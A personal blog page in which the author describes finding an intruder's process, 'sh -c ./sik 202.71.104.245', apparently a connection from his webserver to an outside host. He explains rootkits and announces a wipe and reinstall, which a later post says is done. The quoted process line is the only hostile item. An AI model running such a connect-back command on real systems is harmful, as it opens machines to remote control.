midtoad’s mess.ages
excellence in creative mediocrity

If you’re reading this, obviously I’m back in business. The server was down for only 4 hours, during which time I did a complete Linux install, copied data files back from backup, re-created all databases, and debugged problems. Sorry for any inconvenience.
(more…)

I returned from a business trip to find an unexpected process running on my webserver:
sh -c ./sik 202.71.104.245
What that means is the following: someone found a way through my firewall and onto my webserver, and made a direct connection between my computer and his (most likely it is a young male involved). The next step (which might already have been taken) would be to install (if possible) a root kit.

What is that? A root kit allows the hacker to take over the machine while hiding his tracks so that it becomes difficult to detect his presence. Tools that I would normally use to detect a problem are replaced with compromised versions of same that do not report the nefarious activity. As a result, I might be duped into thinking all is well when it is not.

If my PC has been root-kitted, then nothing may go wrong for some time. Then, when the hacker wants to mount an attack on some large corporation, suddenly my server will be enlisted in the fight, and the first I will know about it is when my internet service provider cancels my account (and possibly commences legal action against me).

One easy way to resolve all of this: simply wipe the hard drive of the server and start again. That’s what I’ll do; so if you read this, don’t be surprised if you can’t get through for the next day or few. When I’m back in business, I’ll have implemented a few extra controls that had slipped my attention previously.

Lesson learned.

Afternoon rays on Port Phillip Bay at Frankston, Victoria, Australia, during a ride around the bay.
(more…)